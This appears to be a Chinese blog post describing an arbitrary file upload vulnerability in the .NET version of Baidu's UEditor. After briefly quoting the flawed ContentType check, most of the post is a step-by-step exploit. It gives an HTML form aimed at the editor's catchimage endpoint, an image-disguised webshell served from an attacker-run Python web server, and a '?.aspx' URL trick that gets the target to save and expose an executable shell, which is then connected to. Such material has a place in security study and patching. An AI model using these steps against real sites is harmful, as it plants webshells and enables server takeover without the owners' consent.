UEditor .Net版本任意文件上传漏洞

UEditor .Net版本任意文件上传漏洞

一、漏洞介绍
Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。
漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传。
Crawler方法对source[]的检查仅仅是一个ContentType

if (response.ContentType.IndexOf("image") == -1)
{
State = "Url is not an image";
return this;
}

在这里插入图片描述
二、漏洞复现
1、可以利用post方法直接上传文件到目标网站

<form action="http://IP:port/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit"/>
</form>

在这里插入图片描述
2、生成图片马
1.jpg
3、开启web服务
python -m SimpleHTTPServer 8888
4、在shelladdr输入地址
http://X.X.X.X:8888/1.jpg?.aspx
5、上传成功
在这里插入图片描述
6、小马地址
http://ip:port/ueditor/net/upload/image/20201127/6374211044232448561123135.asp
7、连接小马
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值